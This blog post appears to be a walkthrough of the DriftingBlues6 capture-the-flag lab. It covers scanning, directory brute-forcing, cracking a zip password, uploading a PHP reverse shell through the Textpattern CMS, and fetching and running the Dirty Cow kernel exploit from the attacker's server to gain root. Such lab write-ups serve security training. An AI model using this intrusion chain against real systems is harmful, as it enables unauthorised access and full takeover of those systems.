PG - DriftingBlues6

PG – DriftingBlues6

In this walk through, we will be going through the DriftingBlues6 room from Proving Grounds. This room is rated as Easy on the platform and it consists of basic enumeration of the Textpattern CMS resulting in later getting a RCE on the target. For the privilege escalation part, it require use of a popular Linux kernel exploit. So, let’s get started without any delay.

DriftingBlues6

Machine Info:

TitleMonitoring
IPaddress192.168.225.136
DifficultyEasy
OSLinux
DescriptionDriftingBlues6 is an easy rated machine and it involves basic enumeration of the Textpattern CMS resulting in later getting a RCE on the target. For the privilege escalation part, it requires use of a popular Linux kernel exploit.

Enumeration:

  • I started off with my regular nmap aggressive scan and found only one port open – 80 (HTTP).

$ sudo nmap -A 192.168.223.219
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-09 14:18 IST

Nmap scan report for 192.168.223.219
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/textpattern/textpattern
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: driftingblues
| vulners: 
|   cpe:/a:apache:http_server:2.2.22: 
|     	CVE-2017-7679	7.5	https://vulners.com/cve/CVE-2017-7679
|     	CVE-2017-3169	7.5	https://vulners.com/cve/CVE-2017-3169
|     	CVE-2017-3167	7.5	https://vulners.com/cve/CVE-2017-3167
|     	SSV:60427	6.9	https://vulners.com/seebug/SSV:60427	*EXPLOIT*
|     	SSV:60386	6.9	https://vulners.com/seebug/SSV:60386	*EXPLOIT*
|     	SSV:60069	6.9	https://vulners.com/seebug/SSV:60069	*EXPLOIT*
|     	CVE-2012-0883	6.9	https://vulners.com/cve/CVE-2012-0883
|     	PACKETSTORM:127546	6.8	https://vulners.com/packetstorm/PACKETSTORM:127546	*EXPLOIT*
|     	CVE-2016-5387	6.8	https://vulners.com/cve/CVE-2016-5387
|     	CVE-2014-0226	6.8	https://vulners.com/cve/CVE-2014-0226
|     	1337DAY-ID-22451	6.8	https://vulners.com/zdt/1337DAY-ID-22451*EXPLOIT*
|     	CVE-2017-9788	6.4	https://vulners.com/cve/CVE-2017-9788
|     	SSV:60788	5.1	https://vulners.com/seebug/SSV:60788	*EXPLOIT*
|     	CVE-2013-1862	5.1	https://vulners.com/cve/CVE-2013-1862
|     	SSV:96537	5.0	https://vulners.com/seebug/SSV:96537	*EXPLOIT*
|     	SSV:62058	5.0	https://vulners.com/seebug/SSV:62058	*EXPLOIT*
|     	SSV:61874	5.0	https://vulners.com/seebug/SSV:61874	*EXPLOIT*
|     	EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D	5.0	https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D	*EXPLOIT*
|     	EDB-ID:42745	5.0	https://vulners.com/exploitdb/EDB-ID:42745	*EXPLOIT*
|     	CVE-2017-9798	5.0	https://vulners.com/cve/CVE-2017-9798
|     	CVE-2016-8743	5.0	https://vulners.com/cve/CVE-2016-8743
|     	CVE-2015-3183	5.0	https://vulners.com/cve/CVE-2015-3183
|     	CVE-2014-0231	5.0	https://vulners.com/cve/CVE-2014-0231
|     	CVE-2014-0098	5.0	https://vulners.com/cve/CVE-2014-0098
|     	CVE-2013-6438	5.0	https://vulners.com/cve/CVE-2013-6438
|     	CVE-2013-5704	5.0	https://vulners.com/cve/CVE-2013-5704
|     	1337DAY-ID-28573	5.0	https://vulners.com/zdt/1337DAY-ID-28573*EXPLOIT*
|     	CVE-2012-0031	4.6	https://vulners.com/cve/CVE-2012-0031
|     	SSV:60905	4.3	https://vulners.com/seebug/SSV:60905	*EXPLOIT*
|     	SSV:60657	4.3	https://vulners.com/seebug/SSV:60657	*EXPLOIT*
|     	SSV:60653	4.3	https://vulners.com/seebug/SSV:60653	*EXPLOIT*
|     	SSV:60345	4.3	https://vulners.com/seebug/SSV:60345	*EXPLOIT*
|     	CVE-2016-4975	4.3	https://vulners.com/cve/CVE-2016-4975
|     	CVE-2014-0118	4.3	https://vulners.com/cve/CVE-2014-0118
|     	CVE-2013-1896	4.3	https://vulners.com/cve/CVE-2013-1896
|     	CVE-2012-4558	4.3	https://vulners.com/cve/CVE-2012-4558
|     	CVE-2012-3499	4.3	https://vulners.com/cve/CVE-2012-3499
|     	CVE-2012-0053	4.3	https://vulners.com/cve/CVE-2012-0053
|     	CVE-2008-0455	4.3	https://vulners.com/cve/CVE-2008-0455
|_    	CVE-2012-2687	2.6	https://vulners.com/cve/CVE-2012-2687
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=1/9%OT=80%CT=1%CU=40703%PV=Y%DS=4%DC=T%G=Y%TM=659D0873
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%II=I%TS=8)SEQ(SP=10
OS:7%GCD=1%ISR=10D%TI=Z%TS=8)OPS(O1=M54EST11NW4%O2=M54EST11NW4%O3=M54ENNT11
OS:NW4%O4=M54EST11NW4%O5=M54EST11NW4%O6=M54EST11)WIN(W1=3890%W2=3890%W3=389
OS:0%W4=3890%W5=3890%W6=3890)ECN(R=Y%DF=Y%T=40%W=3908%O=M54ENNSNW4%CC=Y%Q=)
OS:T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%
OS:T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=A359%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops

TRACEROUTE (using port 554/tcp)
HOP RTT       ADDRESS
1   206.53 ms 192.168.45.1
2   206.53 ms 192.168.45.254
3   206.57 ms 192.168.251.1
4   206.66 ms 192.168.223.219

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.85 seconds

nmap scan

  • Enumerated the web server running on port 80 and found a static page with information related to an album, i guess.

Drifting Blues Tech

  • Fired gobuster on the target to reveal some hidden directories. The two interesting ones was – /robots and /textpattern.

$ gobuster dir -u http://192.168.223.219/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.223.219/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2024/01/09 14:31:28 Starting gobuster in directory enumeration mode
===============================================================
/db                   (Status: 200) [Size: 53656]
/index                (Status: 200) [Size: 750]  
/robots               (Status: 200) [Size: 110]  
/textpattern          (Status: 301) [Size: 324] [--> http://192.168.223.219/textpattern/]
/server-status        (Status: 403) [Size: 296]                                          
                                                                                         
===============================================================
2024/01/09 14:38:03 Finished
===============================================================

gobuster scan

  • Checked the robots.txt file and it shows an entry to disallow crawl access to a specifc directory – /textpattern/textpattern.

robots.txt

  • I first enumerated the directory /textpattern and it shows me a page which seems like a front page of a blog. Found nothing interesting here as the links were also pointing to a non-accessible host.

textpattern directory

  • Next moved to /textpattern/textpattern directory and it reveals a login page. Confirming the Textpattern CMS. Next, i performed a directory bruteforce again and found another directory /textpattern which reveals the version we are dealing with here – 4.8.3. This might come handy later.

Textpattern login panel

textpattern file

  • At this point, i searched for the default creds of Textpattern CMS but found nothing credible. Next, tried bunch of common username and password combo but still found no luck. Finally after a lots of irrelevant enumeration, i once again performed a directory bruteforce on the root directory with a different wordlist and this time it gave me another directory – “spammer” which contains a zip file called spammer.zip.

$ gobuster dir -u http://192.168.216.219/ -w ~/Desktop/Wordlist/directory-medium.txt -x zip
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.216.219/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/directory-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              zip
[+] Timeout:                 10s
===============================================================
2024/01/10 13:52:16 Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 750]
/db                   (Status: 200) [Size: 53656]
/robots               (Status: 200) [Size: 110]  
/spammer              (Status: 200) [Size: 179]  
/spammer.zip          (Status: 200) [Size: 179]  

gobuster scan

Initial Access:

  • Downloaded the zip file to my local machine however it was protected with a password. So, cracked the password using john – myspace4.

zip2john spammer.zip > hash
john hash

cracking the zip

Got password of spammer.zip

  • After unzipping the file, i got the Textpattern backend creds.

unzip spammer.zip

unzip spammer.zip

cat creds.txt

  • Logged into the dashboard. Now, i looked for any known exploits on the application for the running version and found out that it is vulnerable to a Authenticated RCE vulnerability. I tried the available exploits but they tend to fail. So, i performed the exploitation manually.

Got access to backend

  • Uploaded my PHP reverse shell payload using the application’s files section which can be found under the “Content” tab in the header menu.

File upload functionality

backdoor.php uploaded

  • Executed my payload by visiting the below URL and got the connection back at my netcat listener.

Index of /textpattern/files

got initial access

Privilege Escalation:

  • Checked the running kernel version number and it shows – 3.2.0-4-amd64 which is quite old. So, i checked for known exploits for it and found that it is vulnerable to “Dirty Cow” vulnerability.

uname -r

  • Transferred the below exploit onto the target by spawning an HTTP server on our local machine.

Exploit: https://www.exploit-db.com/exploits/40839

Linux Kernel Race Condition Privilege Escalation

wget http://192.168.45.240:8000/40839.c

downloading the exploit on target

  • Compiled and executed the exploit. The exploit will prompt you to enter a new password for the new user that will have root privileges. It maybe take a minute to complete.

gcc -pthread 40839.c -o exploit -lcrypt

chmod +x exploit

./exploit

compiling and executing the exploit

  • After the process is complete, switched to the newly created root user. Thus, getting root on the target.

su firefart

password

got root

proof flag

Also Read: PG – Crane

Conclusion:

Conclusion

So that was “DriftingBlues6” for you. We started off with a regular nmap scan and only one port opened – 80 (HTTP). Enumerated the web server on port 80 and found a textpattern login panel. Fired gobuster on the target and found a spammer.zip file. Next, used john to crack the password of the zip file. The zip file reveals the password of the textpattern login panel. Used the same to get into the backend of the textpattern CMS. Next, abused the file upload functionality to get initial access on the target. For Privilege Escalation, found out that the Linux version running is vulnerable to DirtyCow exploit. Used the same to get root on the target. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top